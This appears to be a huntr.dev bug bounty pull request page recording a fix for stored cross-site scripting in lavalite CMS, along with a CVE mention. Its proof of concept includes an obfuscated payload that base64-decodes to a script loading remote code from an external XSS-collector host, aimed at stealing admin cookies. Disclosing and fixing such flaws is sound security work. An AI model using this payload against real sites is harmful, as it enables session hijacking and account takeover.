Security Fix for Cross-site Scripting (XSS) - huntr.dev

[huntr-helper]

https://huntr.dev/users/alromh87 has fixed the Cross-site Scripting (XSS) vulnerability 🔨. alromh87 has been awarded $25 for fixing the vulnerability through the huntr bug bounty program 💵. Think you could fix a vulnerability like this?

Get involved at https://huntr.dev/

Q | A Version Affected | ALL Bug Fix | YES Original Pull Request | https://github.com/418sec/cms/pull/1 Vulnerability README | https://github.com/418sec/huntr/blob/master/bounties/packagist/lavalite/cms/3/README.md

User Comments:

📊 Metadata *

Bounty URL: https://www.huntr.dev/bounties/3-packagist-lavalite%2Fcms

⚙️ Description *

Admin cookies and other details leading to an account take over to a higher level privilege from a client account of lavalite CMS and other multiple XSS in different pages due to acceptance of unsanitised data.

💻 Technical Description *

Fixed by implementing sanitizing middleware

🐛 Proof of Concept (PoC) *

1. Login to client account and admin account from entirely different browsers or through a private mode.
2. In the client account click on settings and update the address column with the blind payload and save the updates made.

"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYmVlZmVlLnhzcy5odCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61; onerror=eval(atob(this.id))>

3. From the admin account move to the end point http://localhost/admin/user/client .
4. Booyah!!! XSS triggered.

🔥 Proof of Fix (PoF) *

After fix all input will be sanitized prior to being inserted and html components will be stripped from input

👍 User Acceptance Testing (UAT)

Application works normally

[JamieSlome]

@georgemjohn - let me know if you have any questions or thoughts for this fix.

Cheers! 👍

[OS-WS]

Hi, this issue was assigned with CVE-2020-28124. Is there any plan to fix this CVE?